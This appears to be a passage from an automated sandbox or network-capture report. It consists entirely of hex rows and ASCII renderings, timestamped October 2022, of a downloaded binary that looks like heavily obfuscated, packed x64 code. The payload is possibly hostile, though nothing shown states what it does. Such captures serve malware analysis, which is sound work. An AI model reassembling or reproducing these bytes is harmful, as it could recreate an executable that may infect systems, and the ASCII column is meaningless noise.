00 f5 d3 f9 41 1a c9 41 8b 08 41 33 c9 81 e9 34 6d 7d 48 f5 d1 c1 f5 41 f6 c4 31 81 e9 5d 27 e2 59 f8 0f c9 e9 82 fd ff ff 48 63 c0 f8 45 84 cc 48 03 e8 e9 58 93 0d 00
                                                                                                                Data Ascii: g2D*IfADHfAo\@3uHDAfEAE2DAA[fDAIA@AfAtHE2fFfDIGHHEDfDT%fHL^HLIAAA34m}HA1]'YHcEHX
                                                                                                                2022-10-13 11:07:30 UTC2255INData Raw: 9f 2d 09 00 66 44 0f b6 4c 25 00 41 8a ce 8a 4d 02 40 0f 93 c6 48 81 ed 06 00 00 00 48 d3 ce 41 f6 d1 66 ff ce f6 d1 66 3b f9 44 0a c9 0f bf f6 66 44 89 4d 08 66 41 0f be f3 66 0f ce 40 0f 91 c6 9c 0f b7 f5 8f 44 25 00 8b 33 66 85 cd e9 58 5b 01 00 8b 06 66 41 0f 42 cb 53 99 0f a2 44 84 c4 66 41 81 f1 b5 5b 66 44 2b cf 48 81 ee 0c 00 00 00 41 0f 95 c1 41 c0 f9 9a 89 46 0c 89 5e 08 2b dd 66 41 d3 e1 49 c1 f1 d0 89 4e 04 fe cf 45 3a c7 41 02 de 89 16 f5 80 cf e2 5b 66 41 0f a4 f9 f9 41 80 c1 28 41 d3 c1 49 81 ea 04 00 00 00 66 41 0f a3 c1 45 8b 0a 45 33 c8 e9 be 76 0e 00 53 80 db 2c 4c 0f bb e3 48 0f ba fb 2e 31 04 24 48 2b d8 5b 41 f7 c6 81 4a 32 3c 48 63 c0 f8 48 03 f0 e9 a5 0a 13 00 f7 d0 ff c8 4d 3b da e9 14 a5 0d 00 66 f7 d0 e9 ba 8d 10 00 48 0b c5 e9
                                                                                                                Data Ascii: -fDL%AM@HHAff;DfDMfAf@D%3fX[fABSDfA[fD+HAAF^+fAINE:A[fAA(AIfAEE3vS,LH.1$H+[AJ2<HcHM;fH
                                                                                                                2022-10-13 11:07:30 UTC2271INData Raw: 04 00 00 00 33 c6 ff c0 e9 b8 dd ff ff e9 86 ed 10 00 48 8b 54 25 00 41 c0 c1 40 41 d2 f9 4c 8b 4d 08 49 03 d1 48 89 55 08 9c 41 c0 d9 c2 4c 0f b7 cd 8f 44 25 00 48 81 ee 04 00 00 00 41 81 e9 40 72 25 42 44 8b 0e 45 33 cb 41 81 e9 5d 5c 1e 7c 41 d1 c1 f5 f8 41 0f c9 f5 41 c1 c9 02 41 53 66 45 0f ac d3 37 44 31 0c 24 66 44 85 e0 e9 a9 ff 0c 00 48 03 da e9 e0 99 11 00 41 ff c2 e9 db e1 0d 00 48 63 db 4c 03 c3 41 ff e0 66 8b 74 25 00 66 0f ba e1 89 66 0f bb d1 66 8b 4d 02 41 d2 d9 4d 13 cc 66 41 81 d9 8d 0c 48 81 ed 06 00 00 00 41 0f c9 66 f7 d6 45 12 cc 44 8a cd 66 f7 d1 4d 0f b7 cf 41 ff c9 66 41 0f ba f1 86 66 0b f1 66 44 0f be c9 66 89 75 08 9c 45 32 cc 41 0f ba e1 0d 8f 44 25 00 44 8b 0b 48 81 c3 04 00 00 00 41 80 fc 64 40 f6 c7 27 45 33 c8 41 81 c1 29
                                                                                                                Data Ascii: 3HT%A@ALMIHUALD%HA@r%BDE3A]\|AAAASfE7D1$fDHAHcLAft%fffMAMfAHAfEDfMAfAffDfuE2AD%DHAd@'E3A)
                                                                                                                2022-10-13 11:07:30 UTC2287INData Raw: d3 fd 95 a2 a4 5e 00 c6 3a c8 30 c1 4d 72 61 c8 d4 e4 51 cf a3 d9 7c a9 15 4f 4c ae 62 f5 1d a7 fb 63 2d a0 8c c0 b8 c4 12 56 88 c3 65 ec d9 ca fc 7a e9 cd 8b eb f4 72 1b 7d c4 75 6c c7 95 7c f5 51 a5 7b 82 f2 30 1f 1c 64 00 18 6b de 51 11 f2 48 61 16 85 bd 6c 1e 08 2b 5c 19 7f 91 0d 10 e6 07 3d 17 91 a4 a8 73 0f 32 98 74 78 88 c9 7d e1 1e f9 7a 96 8f e4 c5 06 19 d4 c2 71 a3 85 cb e8 35 b5 cc 9f 96 20 a8 01 00 10 af 76 ba 41 a6 ef 2c 71 a1 98 81 1d 1b 58 17 2d 1c 2f ad 7c 15 b6 3b 4c 12 c1 98 d9 76 5f 0e e9 71 28 b4 b8 78 b1 22 88 7f c6 b3 95 c0 56 25 a5 c7 21 9f f4 ce b8 09 c4 c9 cf aa 51 ad 51 3c 61 aa 26 86 30 a3 bf 10 00 a4 c8 e5 0d ac 45 73 3d ab 32 c9 6c a2 ab 5f 5c a5 dc fc c9 c1 42 6a f9 c6 35 d0 a8 cf ac 46 98 c8 db d7 85 77 4b 41 b5 70 3c fb e4
                                                                                                                Data Ascii: ^:0MraQ|OLbc-Vezr}ul|Q{0dkQHal+\=s2tx}zq5 vA,qX-/|;Lv_q(x"V%!QQ<a&0Es=2l_\Bj5FwKAp<
                                                                                                                2022-10-13 11:07:30 UTC2303INData Raw: 08 f9 8b 13 f8 66 44 3b e9 e9 41 2a 0c 00 44 8b 1b 8b 43 04 48 81 eb 04 00 00 00 41 f7 d3 f6 d9 66 0f bc cd f7 d0 66 40 0f be ce 66 0f c9 44 23 d8 41 0f 44 c8 44 89 5b 08 f7 d1 48 0f b7 ca 0f 4c cb 9c 66 81 c9 d1 7c 49 0f b7 c9 8f 03 66 d3 e9 41 0f 4b ce c0 c5 d5 8b 4c 25 00 66 41 81 f8 2b 2c 48 81 c5 04 00 00 00 f5 33 cf f9 e9 00 fb 09 00 e9 f3 2c 0c 00 f5 48 63 ff 41 3a ee 48 03 ef e9 63 80 01 00 48 8b f3 66 85 c5 48 81 eb 02 00 00 00 66 89 33 49 0f b7 f4 8b 74 25 00 e9 31 c1 03 00 49 ff ca 0f 85 0a 67 12 00 5e 41 80 d2 9d 45 1b d7 45 0f ab da f7 d2 41 b2 f2 89 54 25 00 41 81 c2 43 64 e7 07 41 d2 e2 48 81 ee 04 00 00 00 41 c0 c2 ab 66 44 0f 42 d6 44 8b 16 41 80 fa d2 45 33 d3 41 f7 da f5 80 f9 ca 41 81 c2 a7 51 6a 41 41 0f ca 45 84 dc 41 81 f2 4e 73 32
                                                                                                                Data Ascii: fD;A*DCHAff@fD#ADD[HLf|IfAKL%fA+,H3,HcA:HcHfHf3It%1Ig^AEEAT%ACdAHAfDBDAE3AAQjAAEANs2
                                                                                                                2022-10-13 11:07:30 UTC2319INData Raw: 48 0f b7 fc 49 81 e8 04 00 00 00 66 0f ba e7 aa 41 8b 38 f9 48 f7 c4 cc 7d b3 14 41 33 f9 49 81 ff 45 68 9b 1f e9 1b 78 05 00 53 d2 db 31 04 24 41 0f bf de 41 1a dc 5b f8 48 63 c0 4c 85 dd f9 66 41 81 fb a0 12 48 03 e8 e9 9e 6e ff ff 4c 8b 4c 25 00 d2 d5 d2 e6 66 99 48 8b 55 08 81 d9 da 3e 74 65 48 81 c5 10 00 00 00 f5 49 89 11 c1 c9 59 d2 c9 40 f6 c7 06 8b 0b f8 48 81 f9 57 1c 90 74 48 81 c3 04 00 00 00 f8 40 84 fb 41 33 c8 e9 58 5f 0e 00 ff c9 f7 d9 45 84 d0 f8 f9 81 c1 f8 6d 3f 13 f5 41 3a cd f9 53 c0 eb f6 f5 31 0c 24 5b 48 63 c9 45 3a d2 48 03 e9 e9 0a cd 02 00 45 33 d9 49 85 e8 f8 41 81 eb 39 01 af 0f 41 f7 d3 44 3b f9 41 81 f3 2d 79 70 7a 41 c1 cb 03 f9 41 51 44 12 ca 44 31 1c 24 41 80 e1 d2 45 86 c9 41 d3 d1 41 59 40 84 fe 4d 63 db 49 03 eb e9 58
                                                                                                                Data Ascii: HIfA8H}A3IEhxS1$AA[HcLfAHnLL%fHU>teHIY@HWtH@A3X_Em?A:S1$[HcE:HE3IA9AD;A-ypzAAQDD1$AEAAY@McIX
                                                                                                                2022-10-13 11:07:30 UTC2335INData Raw: ee 04 00 00 00 44 8b 0e f9 45 33 cb 41 81 e9 33 76 fc 4e f9 41 d1 c9 f5 45 84 ce 41 f7 d9 e9 2a 22 04 00 81 fb 03 00 00 00 e9 ae 85 07 00 4c 8d 9c 24 40 01 00 00 49 3b db 0f 87 96 63 0b 00 4c 8b dc 66 0f b6 cb 48 b9 00 01 00 00 00 00 00 00 4c 8d 44 23 80 49 81 e0 f0 ff ff ff 81 ce c8 3d 9e 56 66 c1 ee 4f 4c 2b c1 49 8b e0 0f bf f7 49 0f bf f4 66 40 0f be f6 57 9c 49 0f bf f0 41 0f b7 f5 0f bf ff 49 8b f3 66 bf 55 74 40 0f 9d c7 0f 4e fb 49 8b f8 e9 5f b3 0b 00 05 0d 1d 7c 1b 0f c8 45 84 ed 2d 90 36 35 78 f8 e9 84 de 03 00 e9 e3 ec 0f 00 66 f7 d0 e9 e8 99 ff ff ff cf f8 f5 c1 c7 03 f7 d7 f5 66 81 fd 5d 68 f7 df 40 3a c5 44 85 c9 f9 53 41 3a f0 66 d3 c3 44 0f ab c3 31 3c 24 41 f6 c6 53 5b e9 4b ea 07 00 ff c7 f5 d1 cf f8 81 ef eb 34 63 32 e9 72 1d 01 00 4c
                                                                                                                Data Ascii: DE3A3vNAEA*"L$@I;cLfHLD#I=VfOL+IIf@WIAIfUt@NI_|E-65xff]h@:DSA:fD1<$AS[K4c2rL
                                                                                                                2022-10-13 11:07:30 UTC2351INData Raw: 40 80 fe 2a f8 48 85 ed e9 4d 31 06 00 ff e5 81 fb 04 00 00 00 e9 6b a9 06 00 81 f3 81 02 ab 25 41 80 fd b2 f7 d3 f5 0f cb e9 15 86 0a 00 48 63 c9 f5 44 84 db 4c 03 d1 e9 ae 52 10 00 4d 63 db 80 fd 45 40 84 d7 4d 03 cb e9 1c 44 0f 00 40 32 d5 41 3a ea f8 80 f2 02 f8 d0 c2 f5 80 f2 7e 45 3b cf f9 80 ea 4e f6 da e9 81 87 11 00 81 ee 22 55 bb 41 f5 f8 d1 c6 81 c6 7f 2e e3 5c e9 15 93 0b 00 41 ff c1 41 3a cb 41 f7 d1 49 f7 c1 6f 44 fb 3b 41 0f c9 41 53 41 c0 db f1 41 c1 cb 59 44 31 0c 24 41 c0 d3 22 41 5b f5 e9 ed d0 10 00 81 ea 5c 12 0f 64 f7 da 41 f7 c3 c4 78 77 0f f9 41 80 fa cd 41 51 41 80 e1 84 31 14 24 66 41 f7 d9 41 59 3b cd f9 41 80 fe e0 48 63 d2 f9 48 03 ea e9 28 de 09 00 4c 03 c1 41 ff e0 48 8b 3e 49 81 ea f7 4f d7 4f 8a 5e 08 66 45 0f ab fa 48 81
                                                                                                                Data Ascii: @*HM1k%AHcDLRMcE@MD@2A:~E;N"UA.\AA:AIoD;AASAAYD1$A"A[\dAxwAAQA1$fAAY;AHcH(LAH>IOO^fEH
                                                                                                                2022-10-13 11:07:30 UTC2367INData Raw: cb 47 11 00 0f b6 2b 48 81 c3 01 00 00 00 49 d3 c1 66 45 0f ac c1 61 41 32 eb 40 80 f5 97 4d 0f b7 c9 40 d0 cd f5 66 44 03 c9 40 f6 dd 40 80 f5 bf 49 f7 d1 40 d0 cd 41 c0 d9 09 66 41 0f bb d9 4d 0f bf cd 44 32 dd 66 45 0f b6 c8 41 d2 d9 49 81 e8 02 00 00 00 66 41 0f ac c1 54 66 41 89 28 4d 0f a4 c1 ca 66 41 c1 f9 05 40 80 fd 59 44 8b 0b f7 c4 79 51 93 6a 41 84 df f5 48 81 c3 04 00 00 00 48 85 d3 41 f6 c3 6b 45 33 cb e9 24 38 0f 00 f9 48 63 c0 f5 f6 c6 49 48 03 e8 e9 cd f6 09 00 66 8b 6c 25 00 48 c1 c0 fd 8b 03 66 41 3b c0 41 80 fb a2 48 81 c3 04 00 00 00 e9 3e 54 04 00 41 52 c3 e9 7d 74 06 00 53 66 81 db 07 52 4c 0f ac fb 70 44 31 14 24 49 63 de 5b f5 e9 c3 c2 05 00 48 8b dd 48 81 ed 08 00 00 00 41 84 e3 40 0a cc 48 89 5c 25 00 48 d3 e9 48 f7 d9 66 d3 c9
                                                                                                                Data Ascii: G+HIfEaA2@M@fD@@I@AfAMD2fEAIfATfA(MfA@YDyQjAHHAkE3$8HcIHfl%HfA;AH>TAR}tSfRLpD1$Ic[HHA@H\%HHf
                                                                                                                2022-10-13 11:07:30 UTC2383INData Raw: f5 4c 03 c8 41 51 c3 57 c3 35 01 4d 62 07 f9 2d e8 71 52 2e e9 c8 a8 0f 00 66 45 8b 11 44 12 d8 66 45 8b 41 02 49 81 e9 06 00 00 00 66 41 f7 d2 66 41 f7 d0 f9 66 41 0f ba f3 75 66 45 0b d0 4d 63 df 41 b3 cc 45 0f b7 d8 66 45 89 51 08 41 b3 9f 44 0f bf d8 9c 44 1a d8 66 45 0f ac cb dc 41 8f 01 49 0f a3 e3 66 41 c1 eb 4c 41 d3 c3 44 8b 1f f5 41 80 fb d7 45 3a d7 48 81 c7 04 00 00 00 f8 44 33 db f8 41 f7 db f8 41 f7 d3 e9 4e ae 01 00 55 c3 ff c2 41 50 31 14 24 41 58 41 84 d7 48 63 d2 48 f7 c7 84 1f cf 70 4c 03 d2 e9 99 3b 07 00 e9 b4 ec 0a 00 81 fb 03 00 00 00 e9 83 df 02 00 66 41 89 69 08 9c 41 8f 01 8b 2f 40 80 fe ee f5 48 81 c7 04 00 00 00 f8 e9 e8 55 01 00 ff c2 f5 0f ca f7 da e9 5a aa 0c 00 0f ca e9 5a e2 00 00 48 8b 54 25 00 66 40 0f b6 f6 48 0f bc c3
                                                                                                                Data Ascii: LAQW5Mb-qR.fEDfEAIfAfAfAufEMcAEfEQADDfEAIfALADAE:HD3AANUAP1$AXAHcHpL;fAiA/@HUZZHT%f@H
                                                                                                                2022-10-13 11:07:30 UTC2399INData Raw: f1 6e 25 4a 6a e9 cb f1 02 00 f7 d7 e9 2f 8d 0a 00 4d 8b 0b c0 d7 6a 81 d3 c3 3d 18 3e 49 8b 5b 08 49 81 c3 10 00 00 00 49 89 19 49 81 ea 04 00 00 00 66 44 0f a4 f3 14 41 8b 1a f9 e9 f8 b7 ff ff 48 03 ea e9 63 87 0a 00 41 89 40 08 48 0f b7 cb 9c 66 c1 d1 39 d2 fd 41 8f 00 8b 0b 48 81 c3 04 00 00 00 4c 3b c2 41 33 cb 81 c1 7d 70 98 1a f7 d9 40 84 e7 81 e9 87 4d 9d 01 40 80 fc 96 f9 0f c9 41 53 44 12 da 41 fe c3 31 0c 24 66 45 23 dc 41 5b 66 41 85 de f5 48 63 c9 f5 48 03 f9 e9 05 a4 09 00 ff e3 f6 c7 06 53 c0 ff 9f fe cf 31 0c 24 d2 d7 87 db 5b f5 48 63 c9 41 f6 c5 28 48 03 f1 e9 a0 3f 0f 00 ff e6 f9 41 53 31 0c 24 41 0f ba e3 31 66 41 bb 53 4f 49 d3 db 41 5b 48 63 c9 48 03 d9 e9 e1 b5 03 00 e9 97 87 02 00 ff cf e9 4a a5 08 00 ff c7 f5 f9 f7 d7 41 51 31 3c
                                                                                                                Data Ascii: n%Jj/Mj=>I[IIIfDAHcA@Hf9AHL;A3}p@M@ASDA1$fE#A[fAHcHS1$[HcA(H?AS1$A1fASOIA[HcHJAQ1<
                                                                                                                2022-10-13 11:07:30 UTC2415INData Raw: 15 5e 45 b5 62 e4 14 bc fb 72 24 bb 8c 87 29 b3 01 11 19 b4 76 ab 48 bd ef 3d 78 ba 98 9e ed de 06 08 dd d9 71 b2 8c d0 e8 24 bc d7 9f b5 a1 68 0f 23 91 6f 78 99 c0 66 e1 0f f0 61 96 ac 65 05 08 3a 55 02 7f 80 04 0b e6 16 34 0c 91 bb 58 b6 51 2d 68 b1 26 97 39 b8 bf 01 09 bf c8 a2 9c db 56 34 ac dc 21 8e fd d5 b8 18 cd d2 cf 89 d0 6d 5f 1f e0 6a 28 a5 b1 63 b1 33 81 64 c6 90 14 00 58 06 24 07 2f bc 75 0e b6 2a 45 09 c1 df 48 01 4c 49 78 06 3b f3 29 0f a2 65 19 08 d5 c6 8c 6c 4b 50 bc 6b 3c ea ed 62 a5 7c dd 65 d2 ed c0 da 42 7b f0 dd 35 c1 a1 d4 ac 57 91 d3 db f4 04 b7 45 62 34 b0 32 d8 65 b9 ab 4e 55 be dc 73 78 d8 6a e5 48 df 1d 5f 19 d6 84 c9 29 d1 f3 6a bc b5 6d fc 8c b2 1a 46 dd bb 83 d0 ed bc f4 41 f0 03 64 d7 c0 04 13 6d 91 0d 8a fb a1 0a fd 58 34
                                                                                                                Data Ascii: ^Ebr$)vH=xq$h#oxfae:U4XQ-h&9V4!m_j(c3dX$/u*EHLIx;)elKPk<b|eB{5WEb42eNUsxjH_)jmFAdmX4
                                                                                                                2022-10-13 11:07:30 UTC2431INData Raw: ee 0d 5a 66 99 b7 0b 6f 00 21 3b 68 77 b0 26 d7 e7 26 16 d0 90 9c 47 d9 09 0a 77 de 7e a9 e2 ba e0 3f d2 bd 97 85 83 b4 0e 13 b3 b3 79 2e 9e d5 cf b8 ae d2 b8 02 ff db 21 94 cf dc 56 37 5a b8 c8 a1 6a bf bf 1b 3b b6 26 8d 0b b1 51 1c 16 0e c1 8a 26 09 b6 30 77 00 2f a6 47 07 58 05 d2 63 c6 93 e2 64 b1 29 b3 6d 28 bf 83 6a 5f 4a 8e 62 d2 dc be 65 a5 66 ef 6c 3c f0 df 6b 4b 53 4a 0f d5 c5 7a 08 a2 7f 2b 01 3b e9 1b 06 4c 78 06 b9 dc ee 36 be ab 54 67 b7 32 c2 57 b0 45 61 c2 d4 db f7 f2 d3 ac 4d a3 da 35 db 93 dd 42 8b 3e 44 8b 4e 04 40 80 fd 7c 48 0f bf d5 66 99 8a 4e 08 48 81 ee 02 00 00 00 c0 ea bd 44 0f ad cf 48 99 66 41 0f b6 d7 89 7e 08 66 f7 d2 48 87 d2 0f b7 d0 9c 03 d6 d2 ca 8f 06 49 81 ea 04 00 00 00 0f c0 f2 80 f6 45 41 8b 12 66 41 81 fb c1 29 66
                                                                                                                Data Ascii: Zfo!;hw&&Gw~?y.!V7Zj;&Q&0w/GXcd)m(j_Jbefl<kKSJz+;Lx6Tg2WEaM5B>DN@|HfNHDHfA~fHIEAfA)f
                                                                                                                2022-10-13 11:07:30 UTC2447INData Raw: 8b d8 8b d3 f9 f8 2b c9 80 fa ce f9 66 3b d7 81 fb 04 00 00 00 0f 86 0e 00 00 00 ba 04 00 00 00 8d 4b fc 48 0f ab f0 fe c0 c1 e1 03 66 1d 31 19 49 0f b7 c7 c1 e2 03 e9 0c c7 0b 00 41 8b d8 8b d3 2b c9 81 fb 04 00 00 00 e9 1c 14 0d 00 f8 48 63 c0 f9 48 03 f8 ff e7 41 5b 4d 63 d2 41 81 f8 b9 0f 09 0c f9 49 03 da e9 5a eb 0f 00 c1 c6 02 66 44 3b e1 41 53 41 81 f3 12 1b 03 5a 31 34 24 4d 0f ab cb 41 5b f9 41 84 f9 f8 48 63 f6 41 81 f9 a2 1d 50 20 48 03 fe e9 bb da 07 00 ff d0 48 8b 64 25 f0 66 d3 d3 48 8b 6c 25 f8 49 0f a3 f2 48 89 44 25 00 40 c0 de 93 48 81 ff 1c 09 e7 7a 48 8b f5 66 81 c3 e7 23 41 58 66 41 d3 fa 5b 4c 8b d7 49 d3 d2 41 5a d2 da 0f ca 49 81 ea 04 00 00 00 d2 ce 49 03 d2 48 0f bb ca 41 8b 12 66 41 f7 c6 d7 4b 49 81 ff 78 73 de 58 41 33 d0 f5
                                                                                                                Data Ascii: +f;KHf1IA+HcHA[McAIZfD;ASAZ14$MA[AHcAP HHd%fHl%IHD%@HzHf#AXfA[LIAZIIHAfAKIxsXA3
                                                                                                                2022-10-13 11:07:30 UTC2463INData Raw: 49 89 11 66 41 0f bc ca 80 ed 5a 8b 0b 48 81 c3 04 00 00 00 41 33 c8 c1 c9 02 81 e9 b3 44 e8 25 41 84 e1 45 3b d9 f7 d9 e9 47 c2 fd ff 45 84 de 49 81 c0 02 00 00 00 45 3a d3 49 0f a5 f2 66 0f c9 0f 97 c1 e9 a7 de 09 00 48 03 ea e9 c3 1b 05 00 e9 0c e6 ff ff 48 03 f9 e9 39 7c 0e 00 0f 84 bc 58 04 00 4c 8d 15 42 38 05 00 48 0f ba e6 16 48 0f a3 ce 0f b6 31 45 84 e4 e9 2e 45 09 00 48 ff c2 e9 50 24 fe ff e9 de ac 09 00 45 33 c8 44 3a ec 41 f7 d1 41 81 e9 09 3d 06 72 e9 dd ba 01 00 41 0f cb 41 ff c3 e9 97 4b 01 00 66 44 89 4d 08 66 45 0f be cf 41 0f 99 c1 9c 48 81 f9 5b 28 fe 5c 41 81 d1 46 46 3b 04 8f 44 25 00 41 80 d1 ba 41 80 c9 c2 48 81 ee 04 00 00 00 4c 03 cf 49 0f ba e1 14 44 8b 0e f5 e9 9f 3d 05 00 66 41 81 fe 63 75 f5 f7 dd f7 d5 53 e9 5e ea fe ff d1
                                                                                                                Data Ascii: IfAZHA3D%AE;GEIE:IfHH9|XLB8HH1E.EHP$E3D:AA=rAAKfDMfEAH[(\AFF;D%AAHLID=fAcuS^
                                                                                                                2022-10-13 11:07:30 UTC2479INData Raw: d3 ef 89 7d 08 66 ba 82 11 48 63 d4 9c 66 3b d4 48 0f ac d2 5e 66 23 d0 8f 44 25 00 48 81 ee 04 00 00 00 1a f5 8b 16 f9 41 33 d3 e9 fd 23 05 00 48 8b 03 41 d2 fb 45 0a d8 41 fe cb 44 8a 5b 08 48 81 c3 0a 00 00 00 4c 85 fc 44 88 18 66 45 0f ab d3 41 c0 fb 04 44 8b 5c 25 00 49 81 fe 51 16 7a 7c 40 f6 c7 75 e9 5c 32 10 00 44 8b 0b 66 d3 ce e9 06 9c 0d 00 53 c3 66 41 8b 30 41 84 e7 66 45 8b 48 02 40 84 f2 4d 3b c5 e9 bc ab 0c 00 5e f9 48 63 ff 4c 03 c7 41 ff e0 5d 48 63 ff 66 41 85 db 48 03 f7 e9 11 fd 0e 00 00 00 00 38 19 79 09 ae 29 7e 7e 14 78 77 e7 82 48 70 90 21 dd 14 0e b7 ed 13 79 0d bc 1a e0 9b 8c 1d 97 0a 91 a2 07 9c a1 a5 70 26 f0 ac e9 b0 c0 ab 9e 13 55 cf 00 85 65 c8 77 3f 34 c1 ee a9 04 c6 99 5c 09 ce 14 ca 39 c9 63 70 68 c0 fa e6 58 c7 8d 45 cd
                                                                                                                Data Ascii: }fHcf;H^f#D%HA3#HAEAD[HLDfEAD\%IQz|@u\2DfSfA0AfEH@M;^HcLA]HcfAH8y)~~xwHp!yp&Uew?4\9cphXE
                                                                                                                2022-10-13 11:07:30 UTC2495INData Raw: 10 40 f6 d5 48 0f b7 ed 41 8a e9 9c 41 8f 01 48 13 ef 40 c0 dd a9 8b 2f 48 81 c7 04 00 00 00 81 fd 57 2a 4a 59 f5 33 eb e9 bf 28 02 00 ff c8 f5 c1 c8 02 66 41 3b e1 53 66 d3 c3 49 63 da 31 04 24 5b 48 63 c0 66 44 85 c9 48 03 f0 e9 76 80 fe ff 8b 06 0f a2 f9 48 81 ee 0c 00 00 00 44 3a d0 66 41 81 da 41 3b 89 46 0c 41 c0 fa 65 66 44 0f b6 d5 89 5e 08 66 41 c1 ca bd 41 f6 da 89 4e 04 f5 66 44 2b d5 66 45 87 d2 89 16 49 81 e8 04 00 00 00 66 41 ff ca 41 d2 d2 45 8b 10 f9 40 f6 c4 e4 45 33 d1 41 81 f2 65 7e 0c 36 f9 41 c1 ca 03 e9 4f 3c 07 00 66 99 41 ff c8 66 0f a3 e2 41 0f c8 41 81 f0 a9 19 68 58 41 81 e8 36 06 da 15 c0 da 94 f8 55 80 ce bb e9 12 ac 0f 00 c1 c8 02 41 50 41 81 c0 3e 1b 89 00 f5 31 04 24 41 58 f9 48 63 c0 4c 03 d0 e9 5b e7 0c 00 41 52 66 81 c3
                                                                                                                Data Ascii: @HAAH@/HW*JY3(fA;SfIc1$[HcfDHvHD:fAA;FAefD^fAANfD+fEIfAAE@E3Ae~6AO<fAfAAhXA6UAPA>1$AXHcL[ARf
                                                                                                                2022-10-13 11:07:30 UTC2511INData Raw: c9 45 81 fb 04 00 00 00 e9 3a de 04 00 66 f7 c1 ff 0a f9 4c 03 ca e9 13 40 fd ff 41 ff e1 48 8b 4c 25 00 66 41 3b e3 36 66 44 0f b6 11 66 0f b3 e8 48 0f 47 c0 66 d3 e0 48 81 c5 06 00 00 00 66 44 89 54 25 00 48 81 ee 04 00 00 00 24 5a 66 0f ab c0 66 40 0f b6 c7 8b 06 80 fc 37 40 3a e3 41 33 c3 e9 07 4d 08 00 e9 2c 2d 0d 00 4c 03 c8 e9 82 97 ff ff 41 8b 10 66 81 e1 b2 08 66 44 0f ac e9 f4 45 8b 48 04 0f 96 c1 66 44 0f ac e1 d5 49 81 e8 04 00 00 00 c1 f1 f7 f8 f7 d2 66 b9 83 2d 41 f7 d1 d2 e1 41 23 d1 66 f7 d1 41 89 50 08 0f 99 c1 0f 4f cf 48 0f b7 cf 9c ff c1 80 dd 0d 0f c0 ed 41 8f 00 8b 0b 48 81 c3 04 00 00 00 f8 f5 f9 41 33 cb f7 d1 f9 81 c1 7b 4e 1f 55 e9 6c d0 09 00 48 8b 07 48 81 c7 08 00 00 00 44 22 c2 48 33 c3 45 0f b7 c6 49 d3 d8 41 ff c0 48 f7 d8
                                                                                                                Data Ascii: E:fL@AHL%fA;6fDfHGfHfDT%H$Zff@7@:A3M,-LAffDEHfDIf-AA#fAPOHAHA3{NUlHHD"H3EIAH
                                                                                                                2022-10-13 11:07:30 UTC2527INData Raw: 6b fd 09 00 4c 03 d2 e9 49 68 0c 00 40 84 d7 48 63 c9 40 3a f7 4c 03 d1 e9 f6 cb 06 00 e9 c5 54 fd ff c3 48 81 eb 06 00 00 00 40 80 fd 44 e9 df d5 0c 00 48 63 db 4c 03 c3 e9 a9 10 02 00 4c 03 c9 e9 74 16 01 00 e9 3a 88 00 00 f7 d1 e9 8b 6c 05 00 48 8b 7c 25 00 4c 8b 4d 08 d2 e1 8a 4d 10 e9 f0 67 fe ff 41 53 31 34 24 f9 41 5b 41 f6 c0 0d 48 63 f6 e9 00 a4 ff ff ff e5 44 8b 07 40 d2 d5 f9 48 81 c7 04 00 00 00 44 33 c3 66 41 0f b6 ef 49 85 f8 40 c0 f5 d4 41 f7 d8 48 0f b7 ec 66 40 0f be ec 48 0f cd 41 0f c8 0f b7 ed 66 40 0f b6 ed 40 b5 ad 41 ff c8 41 c1 c8 03 66 bd 60 1a 48 0f b7 ee 40 86 ed 41 0f c8 66 0f be e9 48 63 ea 41 0f b7 ea 41 ff c8 66 0f ba e5 82 48 0f ba fd bb 53 66 44 0f ab c3 44 31 04 24 5b 40 c0 ed 5c 49 81 e9 04 00 00 00 45 89 01 66 c1 dd be
                                                                                                                Data Ascii: kLIh@Hc@:LTH@DHcLLt:lH|%LMMgAS14$A[AHcD@HD3fAI@AHf@HAf@@AAf`H@AfHcAAfHSfDD1$[@\IEf
                                                                                                                2022-10-13 11:07:30 UTC2543INData Raw: e5 f9 66 8b 55 02 66 0f ba f0 29 0f bd c7 48 81 ed 06 00 00 00 66 03 ca 66 98 66 40 0f be c6 66 89 4d 08 41 0f b7 c2 48 90 9c 66 c1 c0 0f 8f 44 25 00 48 81 ee 04 00 00 00 8b 06 66 44 85 fc 41 33 c3 f8 f6 c7 da 35 38 20 a1 38 66 85 ff f8 f7 d8 f9 05 31 28 d0 7f 0f c8 f5 40 f6 c4 b2 2d cb 2b 74 69 f7 c5 72 65 8a 7c f5 e9 cd c6 04 00 8b 34 b1 41 c1 e8 08 f5 44 33 c6 e9 36 99 ff ff 48 63 c9 4c 03 c1 e9 22 b6 0d 00 81 f1 62 59 18 4c f7 d1 66 f7 c4 0b 27 f7 d9 44 84 d6 e9 10 53 ff ff 0f 84 9e c0 fc ff 48 8d 15 5f 36 fb ff 0f b6 30 33 f7 81 e6 ff 00 00 00 8b 34 b2 c1 ef 08 33 fe e9 2b b7 ff ff f9 41 0f ca 41 f7 d2 f9 41 c1 ca 02 41 81 ea f3 0e 98 15 41 84 da e9 3b 87 05 00 40 f6 c7 00 4c 03 ce e9 e3 9e fc ff 4d 8b 03 c1 d9 82 36 41 8b 08 41 80 d8 17 66 41 81 c0
                                                                                                                Data Ascii: fUf)Hfff@fMAHfD%HfDA358 8f1(@-+tire|4AD36HcL"bYLf'DSH_60343+AAAAA;@LM6AAfA
                                                                                                                2022-10-13 11:07:30 UTC2559INData Raw: 63 f8 ff c7 49 f7 d3 0f bf f8 49 ff cb 66 41 0f be f9 49 c1 c3 04 49 81 f3 70 2f 43 74 f8 40 d2 df 4d 33 cb f9 48 81 ee 08 00 00 00 4c 89 1e 49 81 e8 04 00 00 00 66 ff c7 41 8b 38 e9 01 2f 01 00 4d 8b 08 49 8b 48 08 49 81 c0 0c 00 00 00 44 84 c0 33 c0 66 41 85 d7 48 85 c9 e9 d7 db fc ff ff 74 25 00 66 41 0f ba fa 45 48 81 c5 08 00 00 00 9d 45 8b 13 49 81 c3 04 00 00 00 44 33 d6 e9 17 36 00 00 fc f3 a4 9d e9 dd 40 00 00 e9 98 eb 02 00 0f b6 07 66 41 c1 c0 b0 48 81 c7 01 00 00 00 66 44 2b c3 32 c3 45 8a c1 41 c0 d0 80 d0 c0 66 45 0f be c1 66 41 0f c8 66 41 ff c0 fe c8 66 45 0f a3 c0 34 b9 66 45 0f a3 e8 66 41 0f bb d0 d0 c8 66 41 ff c0 fe c8 66 45 2b c1 66 41 0f bb e8 f6 d0 32 d8 66 44 8b 04 04 d2 f4 c0 dc 14 49 81 e9 02 00 00 00 c0 c8 b3 66 98 66 23 c7 66
